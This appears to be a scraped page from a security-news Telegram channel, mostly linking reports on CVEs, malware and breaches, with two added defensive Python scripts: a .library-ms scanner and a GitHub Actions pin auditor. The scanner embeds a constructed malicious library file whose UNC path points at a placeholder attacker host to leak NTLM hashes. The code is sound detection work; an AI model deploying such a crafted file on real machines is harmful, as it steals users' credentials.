sysadm_in_channel | Technologies

Telegram channel sysadm_in_channel - Sys-Admin InfoSec


News on cybersecurity / information security, information technology, data leaks / breaches, CVEs, hacks, tools, trainings * Multilingual (En, Ru). * Forum - forum.sys-adm.in * Chat - @sysadm_in * Job - @sysadm_in_job * ? - @sysadminkz


Sys-Admin InfoSec

CVE-2025-24054, NTLM Exploit in the Wild

CVE-2025-24054 is an NTLM hash disclosure (spoofing) vulnerability that can be exploited using a maliciously crafted .library-ms file.

CVE-2025-24054, which also allows NTLM hash disclosure with very little user interaction. For CVE-2025-24054, users can trigger the attack simply by right-clicking or navigating to the folder that holds the maliciously crafted .library-ms file...

Research:

https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/


Sys-Admin InfoSec

🎉 OpenBLD.net at AppSecFest 2025!

On April 25 we meet at AppSecFest 2025, the biggest event of the year in application security.

This year, for the second year in a row, the organizers are supporting OpenBLD.net, and that is damn nice!

We will have our own branded booth, a screen for technology demos, and the OpenBLD.net logo will appear on the festival's official website. This is real recognition that we are doing something truly important 💪

What you will find at our booth:

• T-shirts and stickers
• Live demos of OpenBLD.net technologies
• And most importantly, a chance to talk, discuss ideas, ask questions and get inspired

If you are interested in DNS security, malicious domain filtering, privacy and cyber defense, be sure to stop by. See you at AppSecFest 2025!

• More about the project: openbld.net
• About the festival: appsecfest.kz

P.S. And yes, dear friend, you have a chance to attend the event together with our team 😉


Sys-Admin InfoSec

Threat actors leverage tax season to deploy tax-themed phishing campaigns

https://www.microsoft.com/en-us/security/blog/2025/04/03/threat-actors-leverage-tax-season-to-deploy-tax-themed-phishing-campaigns/


Sys-Admin InfoSec

wsrp4echo - 0day Chain Vulnerability

Web Services for Remote Portlets (WSRP) is an OASIS-approved network protocol standard designed for communication with remote portlets. Used in:

- Oracle WebCenter
- IBM WebSphere
- Microsoft SharePoint

https://medium.com/@aryanchehreghani/wsrp4echo-0day-chain-vulnerability-fd2c395dc45b

P.S. Thx Reaza for the link 🤝


Sys-Admin InfoSec

Exposing Crocodilus: New Device Takeover Malware Targeting Android Devices

Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from the outset, equipped with modern techniques such as remote control, black screen overlays, and advanced data harvesting via accessibility logging. This report explores the features of Crocodilus, its links to known threat actors, and how it lures victims into helping the malware steal their own credentials:

https://www.threatfabric.com/blogs/exposing-crocodilus-new-device-takeover-malware-targeting-android-devices


Sys-Admin InfoSec

Melting Pot of macOS Malware Adds Go to Crystal, Nim and Rust Variants

https://www.sentinelone.com/blog/readerupdate-reforged-melting-pot-of-macos-malware-adds-go-to-crystal-nim-and-rust-variants/


Sys-Admin InfoSec

Windows Shortcut Exploit Abused as Zero-Day in Widespread APT Campaigns

https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html


Sys-Admin InfoSec

StopRansomware: Medusa Ransomware

https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a


Sys-Admin InfoSec

Typosquatted Go Packages Deliver Malware Loader Targeting Linux and macOS Systems

https://socket.dev/blog/typosquatted-go-packages-deliver-malware-loader


Sys-Admin InfoSec

Massive Botnet Targets M365 with Stealthy Password Spraying Attacks

https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/


Sys-Admin InfoSec

New variant of the Snake Keylogger (also known as 404 Keylogger)

https://www.fortinet.com/blog/threat-research/fortisandbox-detects-evolving-snake-keylogger-variant


Sys-Admin InfoSec

LLMjacking targets DeepSeek

https://sysdig.com/blog/llmjacking-targets-deepseek


Sys-Admin InfoSec

🧠 OpenBLD.net - ML Predictive Balancing Coming

This is undoubtedly an innovation. OpenBLD.net smart balancing service is now a separate project, introducing key features:

► Detects slow servers before they start lagging
► If an upstream server shows an increase in timeouts or errors → ML predicts potential failures and automatically prepares backup routes before the infrastructure starts "firing"
► Based on historical data, ML knows when servers experience peak loads (e.g., during lunch hours or at the end of the workday)
► Instead of reacting to downtime, it distributes traffic efficiently in advance
► Reduces latency and timeouts by proactively optimizing traffic distribution
► And much more, including environmental factors such as server energy consumption optimization

The balancer operates like a living organism, learning and adapting to conditions on its own)

How does this benefit users?

🚀 More autonomy and focus on your own development.
⚡ More speed.

📢 This week, the updated balancers will be seamlessly integrated into ADA’s infrastructure—the only thing you might notice is the increased speed.

✌️ Stay fast, stay optimized!


Sys-Admin InfoSec

Weaponizing Background Images for Information Disclosure && LPE: AnyDesk CVE-2024-12754, ZDI-24-1711

https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754


Sys-Admin InfoSec

Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2025-21293)

https://birkep.github.io/posts/Windows-LPE/


Sys-Admin InfoSec

MITRE ending? The US government is ending its support for MITRE. The CVE Foundation has published an emergency statement about it:

https://www.thecvefoundation.org/home

Letter:

https://www.linkedin.com/posts/tib3rius_breaking-from-a-reliable-source-mitre-activity-7317960862332293120-t6yt


Sys-Admin InfoSec

Incomplete NVIDIA Patch to CVE-2024-0132 Exposes AI Infrastructure and Data to Critical Risks

https://www.trendmicro.com/en_us/research/25/d/incomplete-nvidia-patch.html


Sys-Admin InfoSec

ImageRunner: A Privilege Escalation Vulnerability Impacting GCP Cloud Run

https://www.tenable.com/blog/imagerunner-a-privilege-escalation-vulnerability-impacting-gcp-cloud-run


Sys-Admin InfoSec

Fileless cryptominer targeting exposed PostgreSQL with over 1.5K victims

https://www.wiz.io/blog/postgresql-cryptomining


Sys-Admin InfoSec

Have I Been Pwned owner Troy Hunt’s mailing list compromised in phishing attack

https://www.itpro.com/security/phishing/have-i-been-pwned-owner-troy-hunts-mailing-list-compromised-in-phishing-attack


Sys-Admin InfoSec

Technical Explanation of NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File

https://cti.monster/blog/2025/03/18/CVE-2025-24071.html

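The two .library-ms posts on this page (CVE-2025-24054 above and the CVE-2025-24071 write-up just linked) describe the same mechanism: a Windows Library file is plain XML, Explorer resolves every location entry it contains as soon as the enclosing folder is opened or the file is right-clicked, and a UNC path to an attacker host makes the machine authenticate over SMB and leak an NTLM hash. The scanner below is an added example written for this page, not code from Check Point, cti.monster or the channel. Both sample files inside it are constructed, 203.0.113.10 is a documentation-range placeholder, and the trusted_hosts allow list is an assumption about how a triage script for extracted archives or mail attachments would be configured.

```python
"""Scan Windows Library (.library-ms) files for locations on remote hosts.

A .library-ms file is plain XML. When the folder holding it is opened, or the
file is right-clicked, Explorer resolves each <simpleLocation><url> entry; a
UNC path (or file:// URL) to an attacker-controlled host makes Windows
authenticate over SMB and leak an NTLM hash (CVE-2025-24054 / CVE-2025-24071).
Added example for this page, not code from the linked reports.
"""
import re
import sys
import xml.etree.ElementTree as ET
from typing import List, Optional

NS = "{http://schemas.microsoft.com/windows/2009/library}"
UNC_RE = re.compile(r"^\\\\([^\\?]+)")                                 # \\host\share
URL_RE = re.compile(r"^(?:file|https?)://(?:[^/@]+@)?([^/:]+)", re.I)  # scheme://host/...

# Constructed sample: one location, pointing at a share on a non-local address.
MALICIOUS_SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\\\203.0.113.10\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed sample: an ordinary Documents library (known folder + local path).
BENIGN_SAMPLE = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation>
        <url>C:\\Users\\Public\\Documents</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def extract_urls(data: bytes) -> List[str]:
    """Return every <url> text in the library, in document order."""
    root = ET.fromstring(data)
    return [(el.text or "").strip() for el in root.iter(NS + "url")]


def remote_host(url: str) -> Optional[str]:
    """Host a location would be contacted on, or None for local-only locations
    (knownfolder: GUIDs, drive paths, file:///C:/... URLs)."""
    m = UNC_RE.match(url) or URL_RE.match(url)
    return m.group(1) if m else None


def scan_library(data: bytes, trusted_hosts=()) -> List[dict]:
    """One finding per location that points off the machine; 'trusted' is True
    when the host is on the caller's allow list of legitimate file servers."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for url in extract_urls(data):
        host = remote_host(url)
        if host is not None:
            findings.append({"url": url, "host": host, "trusted": host.lower() in trusted})
    return findings


def is_suspicious(data: bytes, trusted_hosts=()) -> bool:
    """True if any location would make Windows authenticate to an untrusted host."""
    return any(not f["trusted"] for f in scan_library(data, trusted_hosts))


if __name__ == "__main__":
    # Usage: python library_ms_scan.py file.library-ms ...
    TRUSTED_HOSTS = ("fileserver.corp.example",)  # assumption: your real file servers
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            data = fh.read()
        try:
            findings = scan_library(data, TRUSTED_HOSTS)
        except ET.ParseError as exc:
            print(f"{path}: not valid XML ({exc})")
            continue
        for f in findings:
            print(f"{path}: {'trusted' if f['trusted'] else 'SUSPICIOUS'} {f['url']} -> {f['host']}")
```

The point of the allow list is that legitimate libraries do reference corporate shares; the signal is a UNC or file:// host you do not recognize inside a file that arrived in an archive or a mail attachment. Note that the file never has to be opened: it is enough for it to sit in a folder the user browses, which is why the scan belongs at the extraction or mail-gateway stage, not at execution time.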

Sys-Admin InfoSec

GitHub Actions - tj-actions/changed-files action is compromised

The tj-actions/changed-files GitHub Action, which is currently used in over 23,000 repositories, has been compromised. In this attack, the attackers modified the action’s code and retroactively updated multiple version tags to reference the malicious commit...

https://www.stepsecurity.io/blog/harden-runner-detection-tj-actions-changed-files-action-is-compromised

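The attack worked because workflows referenced the action by tag, and a tag is just a pointer the repository owner (or whoever holds their token) can move. The audit below is an added example, not StepSecurity's or tj-actions' code: it finds every `uses:` reference in a workflow and reports which ones point at a mutable tag, branch or image tag rather than a commit SHA or image digest, the two reference types a tag move cannot hijack. The workflow text, the action list and the 40-hex SHA on the setup-node line are all constructed for the example (that SHA is not a real release commit).

```python
"""Audit GitHub workflow files for `uses:` references not pinned to a commit.

Tags and branches are mutable: in the tj-actions/changed-files incident the
attackers re-pointed existing version tags at a malicious commit, so every
workflow referencing a tag such as @v45 pulled the backdoored code on its next
run. A 40-hex commit SHA cannot be re-pointed. Added example for this page,
not StepSecurity's or tj-actions' code; the workflow below is constructed.
"""
import re
import sys
from pathlib import Path
from typing import List, Tuple

SHA_RE = re.compile(r"^[0-9a-f]{40}$")
# `- uses: owner/repo@ref`, optionally quoted, with or without the list dash.
USES_RE = re.compile(r"""^\s*-?\s*uses:\s*['"]?([^\s'"#]+)""")

SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: List changed files
        uses: tj-actions/changed-files@v45
      - name: Pinned step (hypothetical SHA, not a real release commit)
        uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567 # v4.0.2
      - uses: ./.github/actions/local-helper
      - uses: docker://alpine:3.19
      - uses: actions/cache
"""


def classify_ref(target: str) -> Tuple[str, str, str]:
    """Return (action, ref, status) for one `uses:` target.

    status: 'pinned'   - immutable commit SHA or image digest
            'mutable'  - tag, branch or image tag that can be re-pointed
            'unpinned' - no ref at all (default branch / latest image)
            'local'    - action from this repository, nothing to pin
    """
    if target.startswith(("./", "../")):
        return target, "", "local"
    if target.startswith("docker://"):
        image = target[len("docker://"):]
        if "@sha256:" in image:
            name, digest = image.split("@", 1)
            return name, digest, "pinned"
        name, _, tag = image.rpartition(":")
        return (name, tag, "mutable") if name else (image, "", "unpinned")
    action, sep, ref = target.partition("@")
    if not sep:
        return action, "", "unpinned"
    return action, ref, "pinned" if SHA_RE.match(ref) else "mutable"


def audit_workflow(text: str) -> List[dict]:
    """One record per `uses:` line: line number, action, ref and status."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = USES_RE.match(line)
        if m:
            action, ref, status = classify_ref(m.group(1))
            findings.append({"line": lineno, "action": action, "ref": ref, "status": status})
    return findings


def unsafe(findings: List[dict]) -> List[dict]:
    """The records a reviewer should block on: anything a tag move could hijack."""
    return [f for f in findings if f["status"] in ("mutable", "unpinned")]


if __name__ == "__main__":
    # Usage: python audit_actions.py .github/workflows/*.yml  (no args: audit the sample)
    sources = [(p, Path(p).read_text()) for p in sys.argv[1:]] or [("<sample>", SAMPLE_WORKFLOW)]
    bad = 0
    for name, text in sources:
        for f in unsafe(audit_workflow(text)):
            bad += 1
            ref = f["ref"] or "<default>"
            print(f"{name}:{f['line']}: {f['action']}@{ref} is {f['status']}; pin to a commit SHA")
    sys.exit(1 if bad else 0)
```

To fix a finding, resolve the tag to the commit it currently points at (`git ls-remote https://github.com/OWNER/REPO v45`), put that SHA after the `@`, and keep the tag in a trailing comment as the pinned sample line does so Dependabot or Renovate can still bump it. Pinning does not help if the SHA you pin was already the malicious commit, so resolve tags only from a repository state you have reviewed.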

Sys-Admin InfoSec

Mass Exploitation of Critical PHP-CGI Vulnerability (CVE-2024-4577), Signaling Broad Campaign

Analysis:

https://blog.talosintelligence.com/new-persistent-attacks-japan/


Sys-Admin InfoSec

Auto-Color: An Emerging and Evasive Linux Backdoor

https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/


Sys-Admin InfoSec

Android trojan TgToxic updates its capabilities

..TgToxic is an Android banking trojan discovered by Trend Micro in July 2022. It’s designed to steal user credentials, cryptocurrency from digital wallets and funds from banking and finance apps.

The actors once again changed the way the malware obtains the C2 URL, from a dead drop location to a domain generation algorithm (DGA)..:

https://intel471.com/blog/android-trojan-tgtoxic-updates-its-capabilities


Sys-Admin InfoSec

AppSecFest - April 25 in Almaty. CFP.

Year after year, AppSecFest.kz delivers on content, organization and scale. The organizers are committed to serious content, a serious audience and real substance.

A friendly atmosphere for everyone, plus, for speakers, the opportunity to present their research and achievements in application development and security.

While the conference website is being built and the organizers are getting organized, the CFP is open for talk proposals related to:

- Mobile, Web, X-Platform, Frontend/Backend, Microservices, Docker/K8s, Blockchain, AI, ML
- DevOps, CI/CD, Agile, UI/UX, code quality and security
- SAST, DAST, IAST, API, IaC, Cloud Security, Pentesting, SDLC, DevSecOps, Vulnerability Management

Submit a speaker proposal - https://appsecfest.kz


Sys-Admin InfoSec

Vgod RANSOMWARE

The ransomware specifically targets Windows systems using advanced encryption techniques, appending a unique file extension to encrypted files...

https://www.cyfirma.com/research/vgod-ransomware


Sys-Admin InfoSec

Leaking the email of any YouTube user for $10,000

https://brutecat.com/articles/leaking-youtube-emails


Sys-Admin InfoSec

Mobile Indian Cyber Heist: FatBoyPanel And His Massive Data Breach

https://www.zimperium.com/blog/mobile-indian-cyber-heist-fatboypanel-and-his-massive-data-breach/


Sys-Admin InfoSec

Unauthorized Data Upload in Alibaba Cloud Object Storage Service

https://medium.com/@muhammadwaseem29/unauthorized-data-upload-in-alibaba-cloud-object-storage-service-cefa6abcef7f
